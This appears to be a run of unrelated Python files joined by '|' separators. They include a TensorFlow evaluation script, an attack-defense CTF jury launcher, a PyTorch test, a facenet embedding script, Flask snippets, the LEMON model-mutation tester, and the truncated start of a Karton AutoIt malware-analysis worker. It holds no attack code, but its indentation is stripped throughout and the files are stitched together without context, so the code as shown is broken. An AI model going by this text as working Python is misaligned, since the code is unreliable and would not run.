print('[End of evaluation for current epoch]\n\nAccuracy for current epoch:%s | total. acc. =%.5f| P. acc. =%.5f| S. acc. =%.5f| '
'noise. acc. =%.5f.' % (step,global_accuracy, global_p_accuracy, global_s_accuracy, global_n_accuracy))
print ('Sleeping for {}s'.format(FLAGS.eval_interval))
time.sleep(FLAGS.eval_interval)
summary_writer.flush()
finally:
# When done, ask the threads to stop.
coord.request_stop()
tf.reset_default_graph()
#print('Sleeping for {}s'.format(FLAGS.eval_interval))
#time.sleep(FLAGS.eval_interval)
finally:
print ('joining data threads')
coord = tf.train.Coordinator()
coord.request_stop()
#pred_labels = pred_labels[1::]
#true_labels = true_labels[1::]
#print ("---Confusion Matrix----")
#print (confusion_matrix(true_labels, pred_labels))
# Wait for threads to finish.
coord.join(threads)
sess.close()
def main(_):
"""
Run unet prediction on input tfrecords
"""
if FLAGS.output_dir is not None:
if not tf.gfile.Exists(FLAGS.output_dir):
print('[INFO ]\tOutput directory does not exist, creating directory: ' + os.path.abspath(FLAGS.output_dir))
tf.gfile.MakeDirs(FLAGS.output_dir)
evaluate()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'Eval Unet on given tfrecords.')
parser.add_argument('--tfrecords_dir', help = 'Tfrecords directory')
parser.add_argument('--tfrecords_prefix', help = 'Tfrecords prefix', default = 'training')
parser.add_argument('--checkpoint_path', help = 'Path of checkpoint to restore. (Ex: ../Datasets/checkpoints/unet.ckpt-80000)')
parser.add_argument('--eval_interval', type=int, default=1,
help='sleep time between evaluations')
parser.add_argument('--num_classes', help = 'Number of segmentation labels', type = int, default = 3)
parser.add_argument('--image_size', help = 'Target image size (resize)', type = int, default = 3001)
parser.add_argument('--batch_size', help = 'Batch size', type = int, default = 2)
parser.add_argument('--events', action='store_true',
help='pass this flag if evaluate acc on events')
parser.add_argument('--weight_decay_rate', help='Weight decay rate', type=float, default=0.0005)
parser.add_argument('--save_summary',type=bool,default=True,
help='True to save summary in tensorboard')
parser.add_argument('--output_dir', help = 'Output directory for the prediction files. If this is not set then predictions will not be saved')
parser.add_argument("--plot", action="store_true",help="pass flag to plot detected events in output")
FLAGS, unparsed = parser.parse_known_args()
tf.app.run()
|
from config.main import *
from pymongo import MongoClient
import functions
import argparse
client = MongoClient(host=DATABASE['HOST'], port=DATABASE['PORT'], connect=False)
#client.jury.authenticate(DATABASE['USER'], DATABASE['PASSWORD'])
db = client.jury
def init(parse):
from classes.initialize import Initialize
Initialize(db, parse.type[0])
def start(parse):
if parse.slave:
from classes.zond import Zond
zond = Zond(db)
zond.run()
else:
from classes.round import Round
round = Round(db)
round.nextPut()
round.nextCheck()
functions.set_interval(round.nextPut, CHECKER['ROUND_LENGTH'])
functions.set_interval(round.nextCheck, CHECKER['CHECK_LENGTH'])
def flags(parse):
from classes.flags import Flags
flags = Flags(db)
flags.start()
def scoreboard(parse):
from classes.scoreboard import Scoreboard
scoreboard = Scoreboard(db)
scoreboard.start()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='The platform for the CTF-competition (Attack-Defense)',
epilog='''Order of actions: init -> start -> flags -> scoreboard.
Good game!''')
sp = parser.add_subparsers(help='sub-command help')
sp_init = sp.add_parser('init', help='Initialize the game. Generate teams, services, statistics.')
sp_init.add_argument('--type', help='type of configuration file', nargs='*', default=['json', 'api'])
sp_init.set_defaults(func=init)
sp_start = sp.add_parser('start', help='Run checkers and start the game.')
sp_start.add_argument('--slave', help='Run as slave', action='store_true')
sp_start.set_defaults(func=start)
sp_flags = sp.add_parser('flags', help='The start of the module "flags"')
sp_flags.set_defaults(func=flags)
sp_scoreboard = sp.add_parser('scoreboard', help='Run scoreboard')
sp_scoreboard.set_defaults(func=scoreboard)
args = parser.parse_args()
if 'func' in args:
    args.func(args)
else:
    parser.print_help()
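# Illustrative usage (added note; the script filename "jury.py" is a placeholder,
# substitute whatever this module is actually saved as):
#
#   python jury.py init --type json api   # generate teams, services, statistics
#   python jury.py start                  # run checkers and start the game
#   python jury.py start --slave          # run as a slave zond
#   python jury.py flags                  # start the "flags" module
#   python jury.py scoreboard             # serve the scoreboard
#
# This mirrors the recommended order from the parser epilog:
# init -> start -> flags -> scoreboard.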
|
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
from parameterized import parameterized
from tests import utils
class SimpleFloorDivideModule(torch.nn.Module):
def __init__(self, inplace=False):
super(SimpleFloorDivideModule, self).__init__()
self.inplace = inplace
def forward(self, a, b):
if b.size() == torch.Size([]):
b = b.item()
if self.inplace:
return (a + a).floor_divide_(b)
else:
return (a + a).floor_divide(b)
class TestFloorDiv(unittest.TestCase):
@unittest.skip(
reason="Disabled while PyTorch floor_divide is fixed: github.com/pytorch/pytorch/issues/43874"
)
def test_floor_div_basic(self):
"""Basic test of the PyTorch div Node on Glow."""
def test_f(a, b):
return (a + a).floor_divide(1.9)
x = torch.randn(4)
y = torch.randn(4)
utils.compare_tracing_methods(test_f, x, y, fusible_ops={"aten::floor_divide"})
@parameterized.expand(
[
(
"basic",
SimpleFloorDivideModule(),
torch.Tensor(4).random_(0, 5),
torch.Tensor(4).random_(1, 5),
),
(
"inplace",
SimpleFloorDivideModule(True),
torch.Tensor(4).random_(0, 5),
torch.Tensor(4).random_(1, 5),
),
(
"positive_float",
SimpleFloorDivideModule(),
torch.Tensor(4).random_(0, 5),
torch.tensor(3.9),
),
(
"positive_broadcast",
SimpleFloorDivideModule(),
torch.Tensor(8, 3, 4, 2).random_(0, 5),
torch.Tensor(4, 2).random_(1, 5),
),
(
"positive_broadcast",
SimpleFloorDivideModule(),
torch.Tensor(8, 3, 4, 2).random_(0, 5),
torch.Tensor(1, 2).random_(1, 5),
),
(
"positive_broadcast",
SimpleFloorDivideModule(),
torch.Tensor(4, 2).random_(0, 5),
torch.Tensor(8, 3, 4, 2).random_(1, 5),
),
]
)
def test_floor_div(self, _, module, left, right):
utils.compare_tracing_methods(
module, left, right, fusible_ops={"aten::floor_divide"}
)
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import argparse
import facenet
import lfw
import os
import sys
import math
from sklearn import metrics
from scipy.optimize import brentq
from scipy import interpolate
def get_image_paths(facedir):
image_paths = []
if os.path.isdir(facedir):
images = os.listdir(facedir)
image_paths = [os.path.join(facedir,img) for img in images]
return image_paths
def main(input_path, output_path, batch_size, model, image_size):
with tf.Graph().as_default():
with tf.Session() as sess:
#for filename in os.listdir(input_path):
# x = filename.split('_')[0]
#directory = (output_path + "/" + x)
# Read the file containing the pairs used for testing
# pairs = lfw.read_pairs(os.path.expanduser(args.lfw_pairs))
# Get the paths for the corresponding images
# paths, actual_issame = lfw.get_paths(os.path.expanduser(args.lfw_dir), pairs, args.lfw_file_ext)
# Load the model
facenet.load_model(model)
# Get input and output tensors
images_placeholder = tf.get_default_graph().get_tensor_by_name("input:0")
embeddings = tf.get_default_graph().get_tensor_by_name("embeddings:0")
phase_train_placeholder = tf.get_default_graph().get_tensor_by_name("phase_train:0")
# image_size = images_placeholder.get_shape()[1] # For some reason this doesn't work for frozen graphs
image_size = image_size
embedding_size = embeddings.get_shape()[1]
# Run forward pass to calculate embeddings
print('Running forward pass on images')
#batch_size = batch_size
nrof_images = len(os.listdir(input_path))
nrof_batches = 1 # int(math.ceil(1.0 * nrof_images / batch_size))
emb_array = np.zeros((nrof_images, embedding_size))
for i in range(nrof_batches):
start_index = i * batch_size
print(start_index)
end_index = min((i + 1) * batch_size, nrof_images)
print(end_index)
#paths_batch = paths[start_index:end_index]
images = facenet.load_data(image_paths, False, False, image_size)
print("I got this far!")
feed_dict = {images_placeholder: images, phase_train_placeholder: False}
emb_array[start_index:end_index, :] = sess.run(embeddings, feed_dict=feed_dict)
# ValueError: Cannot feed value of shape (3, 182, 182, 3) for Tensor u'input:0', which has shape '(?, 160, 160, 3)'
# do I need to specify the shape of the input tensor somewhere?
np.savetxt('/home/iolie/tensorflow/THORN/crop/TEST', emb_array, delimiter=",")
### emb array is all the image vectors in the order they were run,
### but how to ensure they went in in the same order, since os.listdir() returns files in arbitrary order?
### additional column in emb array??
###
input_path = ('/home/iolie/tensorflow/THORN/Minisample') #+ "/" + "0A0A937C-016C-49E6-A9CA-480292B491BC")
output_path = ('/home/iolie/tensorflow/THORN/Minisample') #+ "/" + "0A0A937C-016C-49E6-A9CA-480292B491BC")
batch_size = len(os.listdir(input_path))
model = "/home/iolie/tensorflow/THORN/msft-cfs-face-recognition/analysis/analysis/facenet/temp_models/20170512-110547"
image_size = 160
image_paths = get_image_paths(input_path)
main(input_path, output_path, batch_size, model, image_size)
## this should output a TEST.txt file to the crop folder, with the few test images all contained within
## how big should my batch be??
|
from pykka import ThreadingActor, Timeout
import logging
from util.message_utils import Action
class Consumer(ThreadingActor):
def __init__(self, producers, job, manager):
super(Consumer, self).__init__()
self.producers = producers
self.job = job
self.id = job.id
self.logger = logging.getLogger("src.Consumer")
self.manager = manager
self.clock = manager.clock
self.logger.info("New consumer made with id: " + str(self.id))
def send(self, message, receiver):
"""Send a message to another actor in a framework agnostic way"""
# Sends a blocking message to producers
receiver_id = receiver['id']
receiver = receiver["producer"]
try:
answer = receiver.ask(message, timeout=60)
action = answer['action']
if action == Action.decline:
self.logger.info("Job declined. Time = " + str(self.clock.now))
self.manager.punish_producer(receiver_id)
self.request_producer()
else:
self.logger.info("Job accepted. Time = " + str(self.clock.now))
self.manager.reward_producer(receiver_id)
except Timeout:
self.request_producer()
def receive(self, message):
"""Receive a message in a framework agnostic way"""
action = message['action']
if action == Action.broadcast:
self.producers.append(message['producer'])
def request_producer(self):
"""Function for selecting a producer for a job"""
if self.producers.empty():
self.logger.info("No producer remaining. Buying power from the grid.")
self.manager.register_contract(self.create_grid_contract())
self.stop()
return
# The producer is the third object in the tuple. The first two are for priorities.
producer_pri = self.producers.get()
self.logger.info("Asking producer with ranking " + str(producer_pri[0]))
producer = producer_pri[2]
message = {
'sender': self.actor_ref,
'action': Action.request,
'job': self.job
}
self.send(message, producer)
def create_grid_contract(self):
"""If the consumer buys power from the grid, they make a grid-contract."""
current_time = self.clock.now
id = "grid" + ";" + self.job.id + ";" + str(current_time)
time = self.job.scheduled_time
time_of_agreement = current_time
load_profile = self.job.load_profile
job_id = self.job.id
producer_id = "grid"
return dict(id=id, time=time, time_of_agreement=time_of_agreement, load_profile=load_profile,
job_id=job_id, producer_id=producer_id)
# FRAMEWORK SPECIFIC CODE
def on_receive(self, message):
"""Every message should have a sender field with the reference to the sender"""
self.receive(message)
|
TETRIMINO_T1 = ((0, 0, 0), \
(0, 1, 0), \
(1, 1, 1),)
TETRIMINO_T2 = ((0, 1, 0), \
(0, 1, 1), \
(0, 1, 0),)
TETRIMINO_T3 = ((0, 0, 0), \
(1, 1, 1), \
(0, 1, 0),)
TETRIMINO_T4 = ((0, 1, 0), \
(1, 1, 0), \
(0, 1, 0),)
TETRIMINO_L1 = ((0, 0, 0), \
(1, 0, 0), \
(1, 1, 1),)
TETRIMINO_L2 = ((0, 1, 1), \
(0, 1, 0), \
(0, 1, 0),)
TETRIMINO_L3 = ((0, 0, 0), \
(1, 1, 1), \
(0, 0, 1),)
TETRIMINO_L4 = ((0, 1, 0), \
(0, 1, 0), \
(1, 1, 0),)
TETRIMINO_J1 = ((0, 0, 0), \
(0, 0, 1), \
(1, 1, 1),)
TETRIMINO_J2 = ((0, 1, 0), \
(0, 1, 0), \
(0, 1, 1),)
TETRIMINO_J3 = ((0, 0, 0), \
(1, 1, 1), \
(1, 0, 0),)
TETRIMINO_J4 = ((1, 1, 0), \
(0, 1, 0), \
(0, 1, 0),)
TETRIMINO_Z1 = ((0, 0, 0), \
(1, 1, 0), \
(0, 1, 1),)
TETRIMINO_Z2 = ((0, 0, 1), \
(0, 1, 1), \
(0, 1, 0),)
TETRIMINO_S1 = ((0, 0, 0), \
(0, 1, 1), \
(1, 1, 0),)
TETRIMINO_S2 = ((1, 0, 0), \
(1, 1, 0), \
(0, 1, 0),)
TETRIMINO_I1 = ((0, 0, 0, 0), \
(1, 1, 1, 1), \
(0, 0, 0, 0), \
(0, 0, 0, 0),)
TETRIMINO_I2 = ((0, 0, 1, 0), \
(0, 0, 1, 0), \
(0, 0, 1, 0), \
(0, 0, 1, 0),)
TETRIMINO_O1 = ((0, 0, 0), \
(0, 1, 1), \
(0, 1, 1),)
|
from flask import request
from flask import Blueprint
from flask_restful import Api, Resource
from eventapp.models import db, Event, Admin, User, EventSignup
from eventapp.routes.response import SUCCESS, FAILURE
from flask import jsonify, make_response
from eventapp.services.signature_util import generate_signature
from eventapp.errors import SignatureError, UserNotFountError, EventNotFountError, AlreadySignupError
mod = Blueprint('event', __name__)
api = Api(mod)
class EventsEndPoint(Resource):
def get(self):
resp = {'status': SUCCESS}
http_code = 200
try:
events = Event.query.all()
resp['data'] = events
except Exception as err:
print(f'EventsEndPoint error happened {err}')
raise err
resp_str = jsonify(resp)
return make_response(resp_str, http_code)
api.add_resource(EventsEndPoint, '/events')
|
# send JSON with requests and receive it in Flask
import json
import time
from functools import wraps
import requests
from flask import Flask, Response, g, jsonify, request
r = requests.post('http://httpbin.org/post', json={"key": "value"})
r.status_code
r.json()
# receive json in flask
@app.route('/api/add_message/<uuid>', methods=['GET', 'POST'])
def add_message(uuid):
if request.is_json:  # is_json is a property, not a method
content = request.json
print(content)
return uuid
# calculate response time in flask
# (g.start must be set in a before_request handler, for example:)
@app.before_request
def before_request():
    g.start = time.time()
@app.after_request
def after_request(response):
    diff = time.time() - g.start
    if (response.response):
        response.response[0] = response.response[0].replace(
            '__EXECUTION_TIME__', str(diff))
    return response
# response is a WSGI object, and that means the body of the response must be an iterable. For jsonify() responses that's just a list with just one string in it.
# However, you should use the response.get_data() method here to retrieve the response body, as that'll flatten the response iterable for you.
"""process_response(response)
Can be overridden in order to modify the response object before it’s sent to the WSGI server. By default this will call all the after_request() decorated functions.
Changed in version 0.5: As of Flask 0.5 the functions registered for after request execution are called in reverse order of registration.
Parameters: response – a response_class object.
Returns: a new response object or the same, has to be an instance of response_class."""
# The following should work:
@app.after_request
def after(response):
d = json.loads(response.get_data())
d['altered'] = 'this has been altered...GOOD!'
response.set_data(json.dumps(d))
return response
# Don't use jsonify() again here
# that returns a full new response object
# all you want is the JSON response body here.
# Do use response.set_data() as that'll also adjust the Content-Length header to reflect the altered response size.
@app.route('/data')
def get_data():
return {'foo': 'bar'}
# Here is a custom response class that supports the above syntax, without affecting how other routes that do not return JSON work in any way:
class MyResponse(Response):
@classmethod
def force_type(cls, rv, environ=None):
if isinstance(rv, dict):
rv = jsonify(rv)
return super(MyResponse, cls).force_type(rv, environ)
# Using a Custom Response Class
# By now I'm sure you agree that there are some interesting use cases that can benefit from using a custom response class. Before I show you some actual examples, let me tell you how simple it is to configure a Flask application to use a custom response class. Take a look at the following example:
from flask import Flask, Response
class MyResponse1(Response):
pass
app = Flask(__name__)
app.response_class = MyResponse1
# ...
from flask import Flask, Response
class MyResponse2(Response):
pass
class MyFlask(Flask):
response_class = MyResponse2
app = MyFlask(__name__)
# ...
# Changing Response Defaults
class MyResponse3(Response):
default_mimetype = 'application/xml'
# Determining Content Type Automatically
class MyResponse4(Response):
    def __init__(self, response, **kwargs):
        # Note: check 'content_type' (not 'contenttype') and reference this
        # class, MyResponse4, in the super() call.
        if 'mimetype' not in kwargs and 'content_type' not in kwargs:
            if response.startswith('<?xml'):
                kwargs['mimetype'] = 'application/xml'
        super(MyResponse4, self).__init__(response, **kwargs)
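# A minimal usage sketch of the content-type detection above (added for
# illustration; the route and payload are made up). A returned string that
# starts with '<?xml' is served as application/xml, anything else keeps the
# default mimetype.
app4 = Flask(__name__)
app4.response_class = MyResponse4

@app4.route('/xml-or-text')
def xml_or_text():
    return '<?xml version="1.0"?><greeting>hello</greeting>'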
def my_decorator(f):
@wraps(f)
def wrapper(*args, **kwds):
print('Calling decorated function')
return f(*args, **kwds)
return wrapper
def typing(text: str):
res = text
try:
res = json.loads(text)['res']
print(res, 'try 1')
except Exception as error:
print(error)
try:
res = json.loads('{{"res":{}}}'.format(text))['res']
print(res, 'try 2')
except Exception:
pass
return res
|
# -*-coding:UTF-8-*-
from scripts.logger.lemon_logger import Logger
from scripts.tools.mutator_selection_logic import MCMC, Roulette
import argparse
import sys
import ast
import os
import numpy as np
from itertools import combinations
import redis
import pickle
from scripts.tools import utils
import shutil
import re
import datetime
import configparser
import warnings
np.random.seed(20200501)
warnings.filterwarnings("ignore")
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '2'
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = ""
"""Load Configuration"""
def check_has_NaN(predictions,bk_num):
"""
Check if there is NAN in the result
"""
def get_NaN_num(nds):
_nan_num = 0
for nd in nds:
if np.isnan(nd).any():
_nan_num += 1
return _nan_num
# Three Backends
if len(predictions) == bk_num:
for t in zip(*predictions):
nan_num = get_NaN_num(t)
if 0 < nan_num < bk_num:
return True
else:
continue
return False
else:
raise Exception("wrong backend amounts")
def get_mutate_time(seedname):
regex_str = seedname[:-3]
match = re.search(r"\d+$",regex_str)
return int(match.group())
def save_mutate_history(mcmc:MCMC,invalid_history:dict,mutant_history:list):
mutator_history_path = os.path.join(experiment_dir,"mutator_history.csv")
mutant_history_path = os.path.join(experiment_dir,"mutant_history.txt")
with open(mutator_history_path,"w+") as fw:
fw.write("Name,Success,Invalid,Total\n")
for op in invalid_history.keys():
mtrs = mcmc.mutators[op]
invalid_cnt = invalid_history[op]
fw.write("{},{},{},{}\n".format(op,mtrs.delta_bigger_than_zero,invalid_cnt,mtrs.total))
with open(mutant_history_path,"w+") as fw:
for mutant in mutant_history:
fw.write("{}\n".format(mutant))
def _generate_and_predict(res_dict,filename,mutate_num,mutate_ops,test_size,exp,backends):
"""
Generate models using mutate operators and store them
"""
mutate_op_history = { k:0 for k in mutate_ops}
mutate_op_invalid_history = {k: 0 for k in mutate_ops}
mutant_history = []
origin_model_name = "{}_origin0.h5".format(exp)
origin_save_path = os.path.join(mut_dir,origin_model_name)
shutil.copy(src=filename,dst=origin_save_path)
_,res_dict,inconsistency, _ = _get_model_prediction(res_dict,origin_save_path,origin_model_name,exp,test_size,backends)
mcmc = MCMC(mutate_ops)
roulette = Roulette([origin_model_name])
last_used_mutator = None
last_inconsistency = inconsistency
mutant_counter = 0
while mutant_counter < mutate_num:
picked_seed = utils.ToolUtils.select_mutant(roulette)
selected_op = utils.ToolUtils.select_mutator(mcmc, last_used_mutator=last_used_mutator)
mutate_op_history[selected_op] += 1
last_used_mutator = selected_op
mutator = mcmc.mutators[selected_op]
mutant = roulette.mutants[picked_seed]
# mutator.total += 1
mutant.selected += 1
new_seed_name = "{}-{}{}.h5".format(picked_seed[:-3],selected_op,mutate_op_history[selected_op])
if new_seed_name not in roulette.mutants.keys():
new_seed_path = os.path.join(mut_dir, new_seed_name)
picked_seed_path = os.path.join(mut_dir,picked_seed)
mutate_st = datetime.datetime.now()
mutate_status = os.system("{}/lemon/bin/python -m scripts.mutation.model_mutation_generators --model {} "
"--mutate_op {} --save_path {} --mutate_ratio {}".format(python_prefix,picked_seed_path, selected_op,
new_seed_path,flags.mutate_ratio))
mutate_et = datetime.datetime.now()
mutate_dt = mutate_et - mutate_st
h, m, s = utils.ToolUtils.get_HH_mm_ss(mutate_dt)
mutate_logger.info("INFO:Mutate Time Used on {} : {}h, {}m, {}s".format(selected_op, h, m, s))
if mutate_status == 0:
mutate_logger.info("INFO: Mutation progress {}/{}".format(mutant_counter+1,mutate_num))
predict_status,res_dict,inconsistency,model_outputs = _get_model_prediction(res_dict,new_seed_path,new_seed_name,exp,test_size,backends)
mutator.total += 1
if predict_status :
#mutant_counter += 1
mutant_history.append(new_seed_name)
if utils.ModelUtils.is_valid_model(model_outputs):
mutant_counter += 1
# Sum, over all backend pairs, of the change in inconsistency relative to the previous model
delta = 0
# for every backend
for key in inconsistency.keys():
# compare with last time
delta += inconsistency[key] - last_inconsistency[key]
# if sum of increments on three backends is greater than zero
# then add it into seed pool
if delta > 0:
mutator.delta_bigger_than_zero += 1
if roulette.pool_size >= pool_size:
roulette.pop_one_mutant()
roulette.add_mutant(new_seed_name)
else:
mutate_logger.warning("WARN: {} would not be put into pool".format(new_seed_name))
last_inconsistency = inconsistency
mutate_logger.info("SUCCESS:{} pass testing!".format(new_seed_name))
else:
mutate_op_invalid_history[selected_op] += 1
mutate_logger.error("ERROR: invalid model Found!")
else:
mutate_logger.error("ERROR:Crashed or NaN model Found!")
else:
mutate_logger.error("ERROR:Exception raised when mutate {} with {}".format(picked_seed,selected_op))
mutate_logger.info("Mutated op used history:")
mutate_logger.info(mutate_op_history)
mutate_logger.info("Invalid mutant generated history:")
mutate_logger.info(mutate_op_invalid_history)
save_mutate_history(mcmc,mutate_op_invalid_history,mutant_history)
return res_dict
def generate_metrics_result(res_dict,predict_output,model_idntfr):
mutate_logger.info("INFO: Generating Metrics Result")
inconsistency_score = {}
for pair in combinations(predict_output.items(), 2):
bk_prediction1, bk_prediction2 = pair[0], pair[1]
bk1, prediction1 = bk_prediction1[0], bk_prediction1[1]
bk2, prediction2 = bk_prediction2[0], bk_prediction2[1]
bk_pair = "{}_{}".format(bk1, bk2)
for metrics_name, metrics_result_dict in res_dict.items():
metrics_func = utils.MetricsUtils.get_metrics_by_name(metrics_name)
if metrics_name == 'D_MAD':
deltas = metrics_func(prediction1, prediction2, y_test[:flags.test_size])
inconsistency_score[bk_pair] = sum(deltas)
for i, delta in enumerate(deltas):
dk = "{}_{}_{}_input{}".format(model_idntfr, bk1, bk2, i)
metrics_result_dict[dk] = delta
mutate_logger.info(inconsistency_score)
return True, res_dict,inconsistency_score, predict_output
def _get_model_prediction(res_dict,model_path,model_name,exp,test_size,backends):
"""
Get model prediction on different backends and calculate distance by metrics
"""
predict_output = {b: [] for b in backends}
predict_status = set()
model_idntfr = model_name[:-3]
for bk in backends:
python_bin = f"{python_prefix}/{bk}/bin/python"
predict_st = datetime.datetime.now()
pre_status_bk = os.system(f"{python_bin} -u -m run.patch_prediction_extractor --backend {bk} "
f"--exp {exp} --test_size {test_size} --model {model_path} "
f"--redis_db {lemon_cfg['redis'].getint('redis_db')} --config_name {flags.config_name}")
predict_et = datetime.datetime.now()
predict_td = predict_et - predict_st
h, m, s = utils.ToolUtils.get_HH_mm_ss(predict_td)
mutate_logger.info("INFO:Prediction Time Used on {} : {}h, {}m, {}s".format(bk,h,m,s))
if pre_status_bk == 0: # If no exception is thrown,save prediction result
data = pickle.loads(redis_conn.hget("prediction_{}".format(model_name), bk))
predict_output[bk] = data
else: # record the crashed backend
mutate_logger.error("ERROR:{} crash on backend {} when predicting ".format(model_name,bk))
predict_status.add(pre_status_bk)
if 0 in predict_status and len(predict_status) == 1:
"""If all backends are working fine, check if there is NAN in the result"""
predictions = list(predict_output.values())
has_NaN = check_has_NaN(predictions,len(backends))
if has_NaN:
nan_model_path = os.path.join(nan_dir, model_name)
mutate_logger.error("Error: move NAN model")
shutil.move(model_path, nan_model_path)
return False, res_dict,None, None
else:
mutate_logger.info("INFO: Saving prediction")
with open("{}/prediction_{}.pkl".format(inner_output_dir, model_idntfr), "wb+") as f:
pickle.dump(predict_output, file=f)
with open("{}/patch_prediction_{}.pkl".format(inner_output_dir, model_idntfr), "wb+") as f:
pickle.dump(predict_output, file=f)
return generate_metrics_result(res_dict=res_dict,predict_output=predict_output,model_idntfr=model_idntfr)
else: # record the crashed model
mutate_logger.error("Error: move crash model")
crash_model_path = os.path.join(crash_dir, model_name)
shutil.move(model_path, crash_model_path)
return False, res_dict,None, None
if __name__ == "__main__":
starttime = datetime.datetime.now()
"""Parser of command args"""
parse = argparse.ArgumentParser()
parse.add_argument("--is_mutate", type=ast.literal_eval, default=False,
help="parameter to determine mutation option")
parse.add_argument("--mutate_op", type=str, nargs='+',
choices=['WS', 'GF', 'NEB', 'NAI', 'NS', 'ARem', 'ARep', 'LA', 'LC', 'LR', 'LS','MLA']
, help="parameter to determine mutation option")
parse.add_argument("--model", type=str, help="relative path of model file(from root dir)")
parse.add_argument("--output_dir", type=str, help="relative path of output dir(from root dir)")
parse.add_argument("--backends", type=str, nargs='+', help="list of backends")
parse.add_argument("--mutate_num", type=int, help="number of variant models generated by each mutation operator")
parse.add_argument("--mutate_ratio", type=float, help="ratio of mutation")
parse.add_argument("--exp", type=str, help="experiments identifiers")
parse.add_argument("--test_size", type=int, help="amount of testing image")
parse.add_argument("--config_name", type=str, help="config name")
flags, unparsed = parse.parse_known_args(sys.argv[1:])
warnings.filterwarnings("ignore")
lemon_cfg = configparser.ConfigParser()
lemon_cfg.read(f"./config/{flags.config_name}")
mutate_logger = Logger()
pool = redis.ConnectionPool(host=lemon_cfg['redis']['host'], port=lemon_cfg['redis']['port'],db=lemon_cfg['redis'].getint('redis_db'))
redis_conn = redis.Redis(connection_pool=pool)
for k in redis_conn.keys():
if flags.exp in k.decode("utf-8"):
redis_conn.delete(k)
experiment_dir = os.path.join(flags.output_dir,flags.exp) # exp : like lenet5-mnist
mut_dir = os.path.join(experiment_dir, "mut_model")
crash_dir = os.path.join(experiment_dir, "crash")
nan_dir = os.path.join(experiment_dir, "nan")
inner_output_dir = os.path.join(experiment_dir,"inner_output")
metrics_result_dir = os.path.join(experiment_dir,"metrics_result")
x, y = utils.DataUtils.get_data_by_exp(flags.exp)
x_test, y_test = x[:flags.test_size], y[:flags.test_size]
pool_size = lemon_cfg['parameters'].getint('pool_size')
python_prefix = lemon_cfg['parameters']['python_prefix'].rstrip("/")
try:
metrics_list = lemon_cfg['parameters']['metrics'].split(" ")
lemon_results = {k: dict() for k in metrics_list}
lemon_results = _generate_and_predict(lemon_results,flags.model,flags.mutate_num,flags.mutate_op,
flags.test_size,flags.exp,flags.backends)
with open("{}/{}_lemon_results.pkl".format(experiment_dir,flags.exp),"wb+") as f:
pickle.dump(lemon_results, file=f)
utils.MetricsUtils.generate_result_by_metrics(metrics_list,lemon_results,metrics_result_dir,flags.exp)
except Exception as e:
mutate_logger.exception(sys.exc_info())
from keras import backend as K
K.clear_session()
endtime = datetime.datetime.now()
time_delta = endtime - starttime
h,m,s = utils.ToolUtils.get_HH_mm_ss(time_delta)
mutate_logger.info("INFO:Mutation process is done: Time used: {} hour,{} min,{} sec".format(h,m,s))
|
class gamer():
def __init__(self):
self.position=(80,80)
self.face = 'S'
self.stone_getable= []
self.stone_ungetable=[]
self.stones=[]
self.have_stones=0
self.graph=None
self.tree =[]
self.tree_ungetable =[]
self.tree_getable =[]
self.key =[]
self.axe=[]
self.door=[]
self.have_raft = False
self.treasure=None
self.have_treasure=False
self.have_key = False
self.have_axe = False
def total_stone(self):
        # have_stones / stones are the attributes defined in __init__
        return self.have_stones + len(self.stones)
# def have_key(self):
# return len(self.key)>0
# def have_aex(self):
# return len(self.aex)>0
def total_tree(self):
return len(self.tree)
def get_node(self):
return self.graph[self.position[0]][self.position[1]]
|
# Practice 41. Parsing a Data File
# Input:
# File name : parsing_a_data_file_input
# Output:
# Last First Salary
# ------------------------
# Ling Mai 55900
# Johnson Jim 56500
# Jones Aaron 46000
# Jones Chris 34500
# Swift Geoffrey 14200
# Xiong Fong 65000
# Zarnecki Sabrina 51500
# Constraint:
# - Write your own code to parse the data.
#   Don't use a CSV parser.
# - Use spaces to align the columns.
# - Make each column one space longer than the longest value in the column.
#!/usr/bin/env python
import sys
FILE_NAME = 'parsing_a_data_file_input'
LAST_NAME_IDX = 0
FIRST_NAME_IDX = 1
SALARY_IDX = 2
def read_file():
data_list = []
try:
with open(FILE_NAME, 'r') as f:
for line in f.readlines():
data_list.append(line.strip().split(','))
    except OSError:
        print('File does not exist.')
        sys.exit(1)
return data_list
def get_data_length(in_data_list):
last_name_len = 0
first_name_len = 0
salary_len = 0
for data in in_data_list:
last_name_len = last_name_len if last_name_len > len(data[LAST_NAME_IDX]) else len(data[LAST_NAME_IDX])
first_name_len = first_name_len if first_name_len > len(data[FIRST_NAME_IDX]) else len(data[FIRST_NAME_IDX])
salary_len = salary_len if salary_len > len(data[SALARY_IDX]) else len(data[SALARY_IDX])
return (last_name_len + 1, first_name_len + 1, salary_len + 1)
def print_names(in_data_list):
(last_name_len, first_name_len, salary_len) = get_data_length(in_data_list)
print('{:' '<{}}{:' '<{}}{:' '<{}}'.format('Last', last_name_len, 'First', first_name_len, 'Salary', salary_len))
print ('-------------------------')
for data in in_data_list:
print('{:' '<{}}{:' '<{}}{:' '<{}}'.format(data[LAST_NAME_IDX], last_name_len, \
data[FIRST_NAME_IDX], first_name_len, data[SALARY_IDX], salary_len))
if __name__ == '__main__':
data_list = read_file()
print_names(data_list)
|
from pathlib import Path
from autoit_ripper import AutoItVersion, extract # type: ignore
from karton.core import Karton, Resource, Task
from malduck.yara import Yara # type: ignore
from .__version__ import __version__
from .extract_drop import extract_binary
class AutoItRipperKarton(Karton):
"""
    Extracts embedded AutoIt scripts from binaries and additionally
    tries to extract binary drops from those scripts
"""
identity = "karton.autoit-ripper"
version = __version__
persistent = True
filters = [
{
"type": "sample",
"stage": "recognized",
"kind": "runnable",
"platform": "win32",
},
{
"type": "sample",
"stage": "recognized",
"kind": "runnable",
"platform": "win64",
},
]
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
yara_path = Path(__file__).parent / "autoit.yar"
self.yara = Yara(rule_paths={"autoit": yara_path.as_posix()})
def process(self, task: Task) -> None: # type: ignore
sample = task.get_resource("sample")
resources = None
m = self.yara.match(data=sample.content)
if "autoit_v3_00" in m:
self.log.info("Found a possible autoit v3.00 binary")
resources = extract(data=sample.content, version=AutoItVersion.EA05)
elif "autoit_v3_26" in m:
self.log.info("Found a possible autoit v3.26+ binary")
